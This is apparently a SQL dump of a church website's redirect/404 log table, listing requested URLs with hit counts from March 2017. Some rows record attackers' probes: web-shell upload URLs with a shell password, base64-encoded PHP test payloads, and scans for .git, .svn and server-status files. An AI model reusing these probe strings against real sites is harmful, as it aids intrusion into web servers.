(3939, 'http://www.lifeoasisinternationalchurch.org/cgi-bin/logo_img.php', NULL, 'http://www.lifeoasisinternationalchurch.org/cgi-bin/logo_img.php', '', 1, 0, '2017-03-03 21:06:26', '0000-00-00 00:00:00', 301),
(3940, 'http://www.lifeoasisinternationalchurch.org/loic/zionpillars.php', NULL, '', '', 11, 0, '2017-03-04 01:56:42', '0000-00-00 00:00:00', 301),
(3941, 'http://www.lifeoasisinternationalchurch.org/loic/ljmt.php', NULL, '', '', 33, 0, '2017-03-04 02:07:47', '0000-00-00 00:00:00', 301),
(3942, 'http://lifeoasisinternationalchurch.org/administrator/wp-conns.php', NULL, 'http://lifeoasisinternationalchurch.org/administrator/wp-conns.php', '', 2, 0, '2017-03-04 03:36:36', '0000-00-00 00:00:00', 301),
(3943, 'http://lifeoasisinternationalchurch.org/cgi-bin/logo_img.php', NULL, 'http://lifeoasisinternationalchurch.org/cgi-bin/logo_img.php', '', 1, 0, '2017-03-04 04:48:53', '0000-00-00 00:00:00', 301),
(3944, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_content&view=article&id=48&Itemid=239', NULL, '', '', 1, 0, '2017-03-04 12:47:39', '0000-00-00 00:00:00', 301),
(3945, 'http://www.lifeoasisinternationalchurch.org/index.php/index.php?option=com_content&view=article&id=48:wimmp&catid=18:loic&Itemid=239', NULL, '', '', 1, 0, '2017-03-04 12:59:35', '0000-00-00 00:00:00', 301),
(3946, 'http://lifeoasisinternationalchurch.org/loic/aboutus.php', NULL, '', '', 7, 0, '2017-03-04 14:01:20', '0000-00-00 00:00:00', 301),
(3947, 'http://lifeoasisinternationalchurch.org/testimonies/day.listevents/2012/08/23/15', NULL, '', '', 2, 0, '2017-03-04 16:24:25', '0000-00-00 00:00:00', 301);
INSERT INTO `y57u5_redirect_links` (`id`, `old_url`, `new_url`, `referer`, `comment`, `hits`, `published`, `created_date`, `modified_date`, `header`) VALUES
(3948, 'http://lifeoasisinternationalchurch.org/uploads.php', NULL, '', '', 2, 0, '2017-03-04 18:13:31', '0000-00-00 00:00:00', 301),
(3949, 'http://lifeoasisinternationalchurch.org/loic/mediaoutreach.php', NULL, '', '', 5, 0, '2017-03-04 21:03:45', '0000-00-00 00:00:00', 301),
(3950, 'http://lifeoasisinternationalchurch.org/up.php', NULL, '', '', 18, 0, '2017-03-04 22:35:20', '0000-00-00 00:00:00', 301),
(3951, 'http://www.lifeoasisinternationalchurch.org/media.php', NULL, '', '', 9, 0, '2017-03-05 00:08:31', '0000-00-00 00:00:00', 301),
(3952, 'http://www.lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/18-army-of-the-lord-1', NULL, '', '', 6, 0, '2017-03-05 00:08:31', '0000-00-00 00:00:00', 301),
(3953, 'http://lifeoasisinternationalchurch.org/resources/kindom-builder/8-newsflash', NULL, '', '', 1, 0, '2017-03-05 00:18:36', '0000-00-00 00:00:00', 301),
(3954, 'http://lifeoasisinternationalchurch.org/config.php?type=all_right', NULL, '', '', 1, 0, '2017-03-05 01:13:38', '0000-00-00 00:00:00', 301),
(3955, 'http://lifeoasisinternationalchurch.org/config.php', NULL, '', '', 1, 0, '2017-03-05 01:13:39', '0000-00-00 00:00:00', 301),
(3956, 'http://lifeoasisinternationalchurch.org/letter', NULL, '', '', 1, 0, '2017-03-05 02:35:13', '0000-00-00 00:00:00', 301),
(3957, 'http://www.lifeoasisinternationalchurch.org/index.php/component/content/article/18-loic/35-trm', NULL, '', '', 1, 0, '2017-03-05 04:52:43', '0000-00-00 00:00:00', 301),
(3958, 'http://lifeoasisinternationalchurch.org/full-hd-streaming', NULL, 'http://lifeoasisinternationalchurch.org/streaming', '', 71, 0, '2017-03-05 07:00:38', '0000-00-00 00:00:00', 301),
(3959, 'http://lifeoasisinternationalchurch.org/private-streaming', NULL, 'http://lifeoasisinternationalchurch.org/resources/streaming', '', 27, 0, '2017-03-05 07:01:11', '0000-00-00 00:00:00', 301),
(3960, 'http://www.lifeoasisinternationalchurch.org/main-streaming', NULL, 'http://www.lifeoasisinternationalchurch.org/resources/streaming', '', 440, 0, '2017-03-05 07:01:17', '0000-00-00 00:00:00', 301),
(3961, 'http://lifeoasisinternationalchurch.org/main-streaming', NULL, 'http://lifeoasisinternationalchurch.org/resources/streaming', '', 179, 0, '2017-03-05 07:01:25', '0000-00-00 00:00:00', 301),
(3962, 'http://www.lifeoasisinternationalchurch.org/private-streaming', NULL, 'http://www.lifeoasisinternationalchurch.org/private-streaming', '', 102, 0, '2017-03-05 07:07:32', '0000-00-00 00:00:00', 301),
(3963, 'http://www.lifeoasisinternationalchurch.org/full-hd-streaming', NULL, 'http://www.lifeoasisinternationalchurch.org/main-streaming', '', 76, 0, '2017-03-05 07:14:11', '0000-00-00 00:00:00', 301),
(3964, 'http://lifeoasisinternationalchurch.org/destinytv', NULL, '', '', 9, 0, '2017-03-05 07:50:43', '0000-00-00 00:00:00', 301),
(3965, 'http://www.lifeoasisinternationalchurch.org/resources/streaming', NULL, 'http://www.lifeoasisinternationalchurch.org/', '', 1296, 0, '2017-03-05 08:15:20', '0000-00-00 00:00:00', 301),
(3966, 'http://lifeoasisinternationalchurch.org/resources/streaming', NULL, 'http://lifeoasisinternationalchurch.org/', '', 720, 0, '2017-03-05 08:20:07', '0000-00-00 00:00:00', 301),
(3967, 'http://lifeoasisinternationalchurch.org/loic/events.php', NULL, '', '', 1, 0, '2017-03-05 08:53:43', '0000-00-00 00:00:00', 301),
(3968, 'http://www.lifeoasisinternationalchurch.org/resource', NULL, '', '', 3, 0, '2017-03-05 09:01:48', '0000-00-00 00:00:00', 301),
(3969, 'http://www.lifeoasisinternationalchurch.org/administrator/administrator.php', NULL, 'http://www.lifeoasisinternationalchurch.org/administrator/administrator.php', '', 1, 0, '2017-03-05 09:33:00', '0000-00-00 00:00:00', 301),
(3970, 'http://www.lifeoasisinternationalchurch.org/tmpx.php', NULL, 'http://www.lifeoasisinternationalchurch.org/tmpx.php', '', 1, 0, '2017-03-05 09:33:08', '0000-00-00 00:00:00', 301),
(3971, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/', NULL, '', '', 3, 0, '2017-03-05 10:10:48', '0000-00-00 00:00:00', 301),
(3972, 'http://lifeoasisinternationalchurch.org/asom-2014-online-registration', NULL, '', '', 1, 0, '2017-03-05 11:51:14', '0000-00-00 00:00:00', 301),
(3973, 'http://lifeoasisinternationalchurch.org/tmpx.php', NULL, 'http://lifeoasisinternationalchurch.org/tmpx.php', '', 1, 0, '2017-03-05 16:38:14', '0000-00-00 00:00:00', 301),
(3974, 'http://lifeoasisinternationalchurch.org/administrator/administrator.php', NULL, 'http://lifeoasisinternationalchurch.org/administrator/administrator.php', '', 1, 0, '2017-03-05 16:38:17', '0000-00-00 00:00:00', 301),
(3975, 'http://lifeoasisinternationalchurch.org/loic/kingdombuilders.php', NULL, '', '', 14, 0, '2017-03-05 16:52:14', '0000-00-00 00:00:00', 301),
(3976, 'http://lifeoasisinternationalchurch.org/resources/download', NULL, '', '', 3, 0, '2017-03-05 17:13:09', '0000-00-00 00:00:00', 301),
(3977, 'http://lifeoasisinternationalchurch.org/cfg.php', NULL, '', '', 1, 0, '2017-03-05 18:14:38', '0000-00-00 00:00:00', 301),
(3978, 'http://www.lifeoasisinternationalchurch.org/faith.html', NULL, '', '', 2, 0, '2017-03-05 20:55:47', '0000-00-00 00:00:00', 301),
(3979, 'http://lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/17-entering-into-winning-position-5', NULL, '', '', 3, 0, '2017-03-06 00:13:11', '0000-00-00 00:00:00', 301),
(3980, 'http://lifeoasisinternationalchurch.org/about-us/bible-reading', NULL, '', '', 34, 0, '2017-03-06 09:27:56', '0000-00-00 00:00:00', 301),
(3981, 'http://lifeoasisinternationalchurch.org/wp-conns.php', NULL, 'lifeoasisinternationalchurch.org', '', 1, 0, '2017-03-06 09:51:06', '0000-00-00 00:00:00', 301),
(3982, 'http://lifeoasisinternationalchurch.org/wp-admin/wp-conns.php', NULL, 'lifeoasisinternationalchurch.org', '', 1, 0, '2017-03-06 10:10:44', '0000-00-00 00:00:00', 301),
(3983, 'http://www.lifeoasisinternationalchurch.org/template-info-2/our-service-schedule', NULL, '', '', 4, 0, '2017-03-06 10:34:52', '0000-00-00 00:00:00', 301),
(3984, 'http://lifeoasisinternationalchurch.org/resournces/downloads', NULL, '', '', 3, 0, '2017-03-06 14:53:19', '0000-00-00 00:00:00', 301),
(3985, 'http://lifeoasisinternationalchurch.org/resources/downloa', NULL, '', '', 2, 0, '2017-03-06 18:01:11', '0000-00-00 00:00:00', 301),
(3986, 'http://lifeoasisinternationalchurch.org/resources/downlo', NULL, '', '', 2, 0, '2017-03-06 18:01:12', '0000-00-00 00:00:00', 301),
(3987, 'http://lifeoasisinternationalchurch.org/resources/downl', NULL, '', '', 2, 0, '2017-03-06 18:01:12', '0000-00-00 00:00:00', 301),
(3988, 'http://lifeoasisinternationalchurch.org/resources/down', NULL, '', '', 2, 0, '2017-03-06 18:01:12', '0000-00-00 00:00:00', 301),
(3989, 'http://lifeoasisinternationalchurch.org/resources/d', NULL, '', '', 2, 0, '2017-03-06 18:01:12', '0000-00-00 00:00:00', 301),
(3990, 'http://lifeoasisinternationalchurch.org/resources/dow', NULL, '', '', 2, 0, '2017-03-06 18:01:12', '0000-00-00 00:00:00', 301),
(3991, 'http://lifeoasisinternationalchurch.org/resources/do', NULL, '', '', 2, 0, '2017-03-06 18:01:12', '0000-00-00 00:00:00', 301),
(3992, 'http://www.lifeoasisinternationalchurch.org/loic/groups.php', NULL, '', '', 8, 0, '2017-03-06 18:04:12', '0000-00-00 00:00:00', 301),
(3993, 'http://www.lifeoasisinternationalchurch.org/index.php/106-prayer-focus-for-day-32', NULL, '', '', 6, 0, '2017-03-06 18:29:42', '0000-00-00 00:00:00', 301),
(3994, 'http://www.lifeoasisinternationalchurch.org/media/gass.php', NULL, 'http://www.lifeoasisinternationalchurch.org/media/gass.php', '', 1, 0, '2017-03-06 18:36:27', '0000-00-00 00:00:00', 301),
(3995, 'https://www.dciradio.orghttps//www.dciradio.org', NULL, '', '', 10, 0, '2017-03-06 20:17:05', '0000-00-00 00:00:00', 301),
(3996, 'http://lifeoasisinternationalchurch.org/11-demo-articles/6-integrated-extensions', NULL, '', '', 2, 0, '2017-03-07 10:00:19', '0000-00-00 00:00:00', 301),
(3997, 'http://www.lifeoasisinternationalchurch.org/loic-forum/8-newsflash/6-prophecy', NULL, '', '', 3, 0, '2017-03-07 10:00:50', '0000-00-00 00:00:00', 301),
(3998, 'http://lifeoasisinternationalchurch.org/index.php/11-demo-articles/6-integrated-extensions', NULL, '', '', 1, 0, '2017-03-07 10:30:51', '0000-00-00 00:00:00', 301),
(3999, 'http://lifeoasisinternationalchurch.org/index.php/programme/11-demo-articles/6-integrated-extensions', NULL, '', '', 1, 0, '2017-03-07 10:52:12', '0000-00-00 00:00:00', 301),
(4000, 'http://lifeoasisinternationalchurch.org/wp_cache.php?sam=cHJpbnQoJ2ZidnRzYnRyaHJoJyk7', NULL, 'lifeoasisinternationalchurch.org', '', 1, 0, '2017-03-07 13:10:35', '0000-00-00 00:00:00', 301),
(4001, 'http://lifeoasisinternationalchurch.org/sample.php?sam=cHJpbnQoJ2ZidnRzYnRyaHJoJyk7', NULL, 'lifeoasisinternationalchurch.org', '', 1, 0, '2017-03-07 13:11:04', '0000-00-00 00:00:00', 301),
(4002, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_content&view=article&id=49&Itemid=238', NULL, '', '', 1, 0, '2017-03-07 13:21:50', '0000-00-00 00:00:00', 301),
(4003, 'http://www.lifeoasisinternationalchurch.org/index.php/index.php?option=com_content&view=article&id=49:mimmp&catid=18:loic&Itemid=238', NULL, '', '', 1, 0, '2017-03-07 13:47:14', '0000-00-00 00:00:00', 301),
(4004, 'http://lifeoasisinternationalchurch.org/privatestreaming', NULL, '', '', 13, 0, '2017-03-07 15:15:46', '0000-00-00 00:00:00', 301),
(4005, 'http://www.lifeoasisinternationalchurch.org/ private-streaming', NULL, '', '', 1, 0, '2017-03-07 15:28:48', '0000-00-00 00:00:00', 301),
(4006, 'http://www.lifeoasisinternationalchurch.org/resources/private-streaming', NULL, '', '', 14, 0, '2017-03-07 15:37:12', '0000-00-00 00:00:00', 301),
(4007, 'http://lifeoasisinternationalchurch.org/sreaming', NULL, '', '', 18, 0, '2017-03-07 16:01:13', '0000-00-00 00:00:00', 301),
(4008, 'http://www.lifeoasisinternationalchurch.org/lstreaming', NULL, '', '', 1, 0, '2017-03-07 16:04:25', '0000-00-00 00:00:00', 301),
(4009, 'http://www.lifeoasisinternationalchurch.org/login', NULL, '', '', 8, 0, '2017-03-07 16:04:29', '0000-00-00 00:00:00', 301),
(4010, 'http://www.lifeoasisinternationalchurch.org/resources/s', NULL, '', '', 1, 0, '2017-03-07 16:04:37', '0000-00-00 00:00:00', 301),
(4011, 'http://www.lifeoasisinternationalchurch.org/privatestreaming', NULL, '', '', 57, 0, '2017-03-07 16:11:49', '0000-00-00 00:00:00', 301),
(4012, 'http://lifeoasisinternationalchurch.org/wp-check.php?z=cHJpbnQoJ2ZidnRzYnRyaHJoJyk7', NULL, 'lifeoasisinternationalchurch.org', '', 1, 0, '2017-03-07 16:25:59', '0000-00-00 00:00:00', 301),
(4013, 'http://www.lifeoasisinternationalchurch.org/null', NULL, '', '', 4, 0, '2017-03-07 16:27:18', '0000-00-00 00:00:00', 301),
(4014, 'http://lifeoasisinternationalchurch.org/testimonies/day.listevents/2012/08/31/15', NULL, '', '', 2, 0, '2017-03-07 18:03:16', '0000-00-00 00:00:00', 301),
(4015, 'http://lifeoasisinternationalchurch.org/Administration.html', NULL, '', '', 2, 0, '2017-03-07 19:08:42', '0000-00-00 00:00:00', 301),
(4016, 'http://lifeoasisinternationalchurch.org/feedback.html', NULL, '', '', 1, 0, '2017-03-07 20:04:22', '0000-00-00 00:00:00', 301),
(4017, 'http://www.lifeoasisinternationalchurch.org/template-info/outreach/18-loic/50-young-achievers', NULL, '', '', 1, 0, '2017-03-07 22:39:04', '0000-00-00 00:00:00', 301),
(4018, 'http://www.lifeoasisinternationalchurch.org/template-info/mimmp/18-loic/50-young-achievers', NULL, '', '', 2, 0, '2017-03-07 22:39:04', '0000-00-00 00:00:00', 301),
(4019, 'http://www.lifeoasisinternationalchurch.org/index.php/11-demo-articles/53-testing', NULL, '', '', 3, 0, '2017-03-08 00:17:01', '0000-00-00 00:00:00', 301),
(4020, 'http://www.lifeoasisinternationalchurch.org/index.php/finance-convention-online-registration', NULL, '', '', 9, 0, '2017-03-08 00:53:55', '0000-00-00 00:00:00', 301),
(4021, 'http://lifeoasisinternationalchurch.org/testimonies/day.listevents/2012/08/18/15', NULL, '', '', 2, 0, '2017-03-08 01:11:15', '0000-00-00 00:00:00', 301),
(4022, 'http://lifeoasisinternationalchurch.org/index.php?option=com_k2&amp;view=itemlist&amp;Itemid=622&amp;month=4&amp;year=2017&amp;task=calendar', NULL, '', '', 1, 0, '2017-03-08 01:36:49', '0000-00-00 00:00:00', 301),
(4023, 'http://www.lifeoasisinternationalchurch.org/template-info/media-outreach/18-loic/50-young-achievers', NULL, '', '', 3, 0, '2017-03-08 07:05:50', '0000-00-00 00:00:00', 301),
(4024, 'http://www.lifeoasisinternationalchurch.org/alb.php', NULL, 'http://www.lifeoasisinternationalchurch.org/alb.php', '', 1, 0, '2017-03-08 07:24:24', '0000-00-00 00:00:00', 301),
(4025, 'http://www.lifeoasisinternationalchurch.org/mod_footer.php', NULL, 'http://www.lifeoasisinternationalchurch.org/mod_footer.php', '', 1, 0, '2017-03-08 07:42:47', '0000-00-00 00:00:00', 301),
(4026, 'http://lifeoasisinternationalchurch.org/component/tags/tag/', NULL, '', '', 1, 0, '2017-03-08 08:34:42', '0000-00-00 00:00:00', 301),
(4027, 'http://lifeoasisinternationalchurch.org/component/tags/tag/administrator/', NULL, '', '', 1, 0, '2017-03-08 08:34:43', '0000-00-00 00:00:00', 301),
(4028, 'http://lifeoasisinternationalchurch.org/component/tags/administrator/', NULL, '', '', 1, 0, '2017-03-08 08:34:43', '0000-00-00 00:00:00', 301),
(4029, 'http://lifeoasisinternationalchurch.org/component/administrator/', NULL, '', '', 5, 0, '2017-03-08 08:34:43', '0000-00-00 00:00:00', 301),
(4030, 'http://www.lifeoasisinternationalchurch.org/prayer.php', NULL, '', '', 2, 0, '2017-03-08 14:20:40', '0000-00-00 00:00:00', 301),
(4031, 'http://lifeoasisinternationalchurch.org/mod_footer.php', NULL, 'http://lifeoasisinternationalchurch.org/mod_footer.php', '', 1, 0, '2017-03-08 14:34:48', '0000-00-00 00:00:00', 301),
(4032, 'http://lifeoasisinternationalchurch.org/cachee/logo_img.php', NULL, 'http://lifeoasisinternationalchurch.org/cachee/logo_img.php', '', 1, 0, '2017-03-08 14:34:51', '0000-00-00 00:00:00', 301),
(4033, 'http://lifeoasisinternationalchurch.org/straming', NULL, '', '', 2, 0, '2017-03-08 16:05:24', '0000-00-00 00:00:00', 301),
(4034, 'http://www.lifeoasisinternationalchurch.org/resources/livestreaming', NULL, '', '', 7, 0, '2017-03-08 16:13:59', '0000-00-00 00:00:00', 301),
(4035, 'http://lifeoasisinternationalchurch.org/videostreaming', NULL, '', '', 1, 0, '2017-03-08 17:31:28', '0000-00-00 00:00:00', 301),
(4036, 'http://lifeoasisinternationalchurch.org/templates/rt_ionosphere/css/css-ce9ab86c3d4c230e0bf7ae575a037f49.php', NULL, 'http://lifeoasisinternationalchurch.org/', '', 1, 0, '2017-03-08 19:30:43', '0000-00-00 00:00:00', 301),
(4037, 'http://www.lifeoasisinternationalchurch.org/livesteaming', NULL, '', '', 1, 0, '2017-03-08 19:57:15', '0000-00-00 00:00:00', 301),
(4038, 'http://www.lifeoasisinternationalchurch.org/prayer/60-day8', NULL, '', '', 3, 0, '2017-03-08 21:35:13', '0000-00-00 00:00:00', 301),
(4039, 'http://lifeoasisinternationalchurch.org/Administrator', NULL, '', '', 1, 0, '2017-03-08 21:56:40', '0000-00-00 00:00:00', 301),
(4040, 'http://lifeoasisinternationalchurch.org/administration', NULL, '', '', 1, 0, '2017-03-08 21:56:57', '0000-00-00 00:00:00', 301),
(4041, 'http://www.lifeoasisinternationalchurch.org/ssyoutube', NULL, '', '', 1, 0, '2017-03-08 23:11:02', '0000-00-00 00:00:00', 301),
(4042, 'http://www.lifeoasisinternationalchurch.org/thumb.php?z3=bnRsQ1dZLnBocA==&z4=Lw==', NULL, 'www.lifeoasisinternationalchurch.org', '', 2, 0, '2017-03-09 01:45:19', '0000-00-00 00:00:00', 301),
(4043, 'http://www.lifeoasisinternationalchurch.org/tmp/sfx.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=', NULL, '', '', 1, 0, '2017-03-09 03:09:55', '0000-00-00 00:00:00', 301),
(4044, 'http://www.lifeoasisinternationalchurch.org/up.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=', NULL, '', '', 1, 0, '2017-03-09 03:09:56', '0000-00-00 00:00:00', 301),
(4045, 'http://www.lifeoasisinternationalchurch.org/m.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=', NULL, '', '', 1, 0, '2017-03-09 03:09:58', '0000-00-00 00:00:00', 301),
(4046, 'http://www.lifeoasisinternationalchurch.org/ny.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=', NULL, '', '', 1, 0, '2017-03-09 03:10:00', '0000-00-00 00:00:00', 301),
(4047, 'http://www.lifeoasisinternationalchurch.org/media/jss.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=', NULL, '', '', 1, 0, '2017-03-09 03:10:08', '0000-00-00 00:00:00', 301),
(4048, 'http://www.lifeoasisinternationalchurch.org/nktt.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=', NULL, '', '', 1, 0, '2017-03-09 03:10:19', '0000-00-00 00:00:00', 301),
(4049, 'http://www.lifeoasisinternationalchurch.org/zibi.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=', NULL, '', '', 1, 0, '2017-03-09 03:10:20', '0000-00-00 00:00:00', 301),
(4050, 'http://www.lifeoasisinternationalchurch.org/u.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=', NULL, '', '', 1, 0, '2017-03-09 03:10:22', '0000-00-00 00:00:00', 301),
(4051, 'http://www.lifeoasisinternationalchurch.org/ws0.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=', NULL, '', '', 1, 0, '2017-03-09 03:10:25', '0000-00-00 00:00:00', 301),
(4052, 'http://lifeoasisinternationalchurch.org/index.html', NULL, '', '', 2, 0, '2017-03-09 03:21:15', '0000-00-00 00:00:00', 301),
(4053, 'http://www.lifeoasisinternationalchurch.org/b1.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=', NULL, '', '', 1, 0, '2017-03-09 03:31:21', '0000-00-00 00:00:00', 301),
(4054, 'http://www.lifeoasisinternationalchurch.org/mide.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=', NULL, '', '', 1, 0, '2017-03-09 03:31:24', '0000-00-00 00:00:00', 301),
(4055, 'http://www.lifeoasisinternationalchurch.org/up14.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=', NULL, '', '', 1, 0, '2017-03-09 03:52:58', '0000-00-00 00:00:00', 301),
(4056, 'http://www.lifeoasisinternationalchurch.org/ntlCWY.php', NULL, '', '', 1, 0, '2017-03-09 03:53:32', '0000-00-00 00:00:00', 301),
(4057, 'http://www.lifeoasisinternationalchurch.org/wp-installation.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=', NULL, '', '', 1, 0, '2017-03-09 03:53:49', '0000-00-00 00:00:00', 301),
(4058, 'http://www.lifeoasisinternationalchurch.org/studycentre', NULL, '', '', 2, 0, '2017-03-09 08:04:03', '0000-00-00 00:00:00', 301),
(4059, 'http://www.lifeoasisinternationalchurch.org/component/content/article/11-demo-articles/6-integrated-extensions', NULL, '', '', 2, 0, '2017-03-09 08:34:55', '0000-00-00 00:00:00', 301),
(4060, 'http://www.lifeoasisinternationalchurch.org/index.php/component/content/article/11-demo-articles/6-integrated-extensions', NULL, '', '', 1, 0, '2017-03-09 08:35:14', '0000-00-00 00:00:00', 301),
(4061, 'http://lifeoasisinternationalchurch.org/partnership/administrator/', NULL, '', '', 2, 0, '2017-03-09 09:48:47', '0000-00-00 00:00:00', 301),
(4062, 'http://www.lifeoasisinternationalchurch.org/index.php/guidelines', NULL, '', '', 5, 0, '2017-03-09 10:04:11', '0000-00-00 00:00:00', 301),
(4063, 'https://www.spiritmeat.net/resources/hd', NULL, '', '', 1, 0, '2017-03-09 11:55:17', '0000-00-00 00:00:00', 301),
(4064, 'http://www.lifeoasisinternationalchurch.org/index.php/241-2016-day-24', NULL, '', '', 5, 0, '2017-03-09 12:49:55', '0000-00-00 00:00:00', 301),
(4065, 'http://lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/15', NULL, '', '', 1, 0, '2017-03-09 13:08:12', '0000-00-00 00:00:00', 301),
(4066, 'http://lifeoasisinternationalchurch.org/index.php/11-kindom-builder/44-prayer-a-fasting-day-33', NULL, '', '', 3, 0, '2017-03-09 13:14:58', '0000-00-00 00:00:00', 301),
(4067, 'http://lifeoasisinternationalchurch.org/index.php/component/content/category/', NULL, '', '', 5, 0, '2017-03-09 13:41:42', '0000-00-00 00:00:00', 301),
(4068, 'http://lifeoasisinternationalchurch.org/index.php/component/content/category/administrator/', NULL, '', '', 5, 0, '2017-03-09 13:41:42', '0000-00-00 00:00:00', 301),
(4069, 'http://lifeoasisinternationalchurch.org/index.php/component/content/administrator/', NULL, '', '', 5, 0, '2017-03-09 13:41:42', '0000-00-00 00:00:00', 301),
(4070, 'http://lifeoasisinternationalchurch.org/index.php/component/administrator/', NULL, '', '', 5, 0, '2017-03-09 13:41:43', '0000-00-00 00:00:00', 301),
(4071, 'http://lifeoasisinternationalchurch.org/resources/administrator/', NULL, '', '', 2, 0, '2017-03-09 13:51:36', '0000-00-00 00:00:00', 301),
(4072, 'http://lifeoasisinternationalchurch.org/loic/onlinecommunities.php', NULL, '', '', 11, 0, '2017-03-09 14:00:59', '0000-00-00 00:00:00', 301),
(4073, 'http://lifeoasisinternationalchurch.org/component/k2/item/', NULL, '', '', 2, 0, '2017-03-09 16:25:04', '0000-00-00 00:00:00', 301),
(4074, 'http://lifeoasisinternationalchurch.org/component/k2/item/administrator/', NULL, '', '', 2, 0, '2017-03-09 16:25:04', '0000-00-00 00:00:00', 301),
(4075, 'http://lifeoasisinternationalchurch.org/component/k2/administrator/', NULL, '', '', 4, 0, '2017-03-09 16:25:05', '0000-00-00 00:00:00', 301),
(4076, 'http://www.lifeoasisinternationalchurch.org/56-day2', NULL, '', '', 1, 0, '2017-03-09 23:55:14', '0000-00-00 00:00:00', 301),
(4077, 'http://www.lifeoasisinternationalchurch.org/161-day222014-5', NULL, '', '', 1, 0, '2017-03-10 02:07:38', '0000-00-00 00:00:00', 301),
(4078, 'http://lifeoasisinternationalchurch.org/loic-forum', NULL, '', '', 1, 0, '2017-03-10 05:38:38', '0000-00-00 00:00:00', 301),
(4079, 'http://lifeoasisinternationalchurch.org/.svn/entries', NULL, '', '', 5, 0, '2017-03-10 05:56:17', '0000-00-00 00:00:00', 301),
(4080, 'http://lifeoasisinternationalchurch.org/nginx_status', NULL, '', '', 2, 0, '2017-03-10 05:56:20', '0000-00-00 00:00:00', 301),
(4081, 'http://lifeoasisinternationalchurch.org/CVS/Root', NULL, '', '', 2, 0, '2017-03-10 05:56:20', '0000-00-00 00:00:00', 301),
(4082, 'http://lifeoasisinternationalchurch.org/basic_status', NULL, '', '', 1, 0, '2017-03-10 05:56:23', '0000-00-00 00:00:00', 301),
(4083, 'http://www.lifeoasisinternationalchurch.org/.svn/entries', NULL, '', '', 2, 0, '2017-03-10 05:56:25', '0000-00-00 00:00:00', 301),
(4084, 'http://www.lifeoasisinternationalchurch.org/core', NULL, '', '', 3, 0, '2017-03-10 05:56:25', '0000-00-00 00:00:00', 301),
(4085, 'http://www.lifeoasisinternationalchurch.org/basic_status', NULL, '', '', 1, 0, '2017-03-10 05:56:30', '0000-00-00 00:00:00', 301),
(4086, 'http://www.lifeoasisinternationalchurch.org/nginx_status', NULL, '', '', 1, 0, '2017-03-10 05:56:31', '0000-00-00 00:00:00', 301),
(4087, 'http://www.lifeoasisinternationalchurch.org/CVS/Root', NULL, '', '', 1, 0, '2017-03-10 05:56:31', '0000-00-00 00:00:00', 301),
(4088, 'http://www.lifeoasisinternationalchurch.org/about-us/bible-reading', NULL, '', '', 17, 0, '2017-03-10 06:10:34', '0000-00-00 00:00:00', 301),
(4089, 'http://lifeoasisinternationalchurch.org/loic/globalintercessorynetwork.php', NULL, '', '', 3, 0, '2017-03-10 08:17:36', '0000-00-00 00:00:00', 301),
(4090, 'https://spiritmeat.net/.git/config', NULL, '', '', 1, 0, '2017-03-10 10:23:40', '0000-00-00 00:00:00', 301),
(4091, 'https://spiritmeat.net/.svn/entries', NULL, '', '', 1, 0, '2017-03-10 10:23:41', '0000-00-00 00:00:00', 301),
(4092, 'https://spiritmeat.net/core', NULL, '', '', 2, 0, '2017-03-10 10:23:42', '0000-00-00 00:00:00', 301),
(4093, 'https://spiritmeat.net/server-status', NULL, '', '', 1, 0, '2017-03-10 10:23:43', '0000-00-00 00:00:00', 301),
(4094, 'https://spiritmeat.net/basic_status', NULL, '', '', 1, 0, '2017-03-10 10:23:44', '0000-00-00 00:00:00', 301),
(4095, 'https://spiritmeat.net/nginx_status', NULL, '', '', 1, 0, '2017-03-10 10:23:45', '0000-00-00 00:00:00', 301),
(4096, 'https://spiritmeat.net/CVS/Root', NULL, '', '', 1, 0, '2017-03-10 10:23:46', '0000-00-00 00:00:00', 301),
(4097, 'https://www.spiritmeat.net/.git/config', NULL, '', '', 1, 0, '2017-03-10 10:23:51', '0000-00-00 00:00:00', 301),
(4098, 'https://www.spiritmeat.net/.svn/entries', NULL, '', '', 1, 0, '2017-03-10 10:23:52', '0000-00-00 00:00:00', 301),
(4099, 'https://www.spiritmeat.net/core', NULL, '', '', 2, 0, '2017-03-10 10:23:53', '0000-00-00 00:00:00', 301),
(4100, 'https://www.spiritmeat.net/server-status', NULL, '', '', 1, 0, '2017-03-10 10:23:55', '0000-00-00 00:00:00', 301),
(4101, 'https://www.spiritmeat.net/basic_status', NULL, '', '', 1, 0, '2017-03-10 10:23:56', '0000-00-00 00:00:00', 301),
(4102, 'https://www.spiritmeat.net/nginx_status', NULL, '', '', 1, 0, '2017-03-10 10:23:56', '0000-00-00 00:00:00', 301),
(4103, 'https://www.spiritmeat.net/CVS/Root', NULL, '', '', 1, 0, '2017-03-10 10:23:57', '0000-00-00 00:00:00', 301),
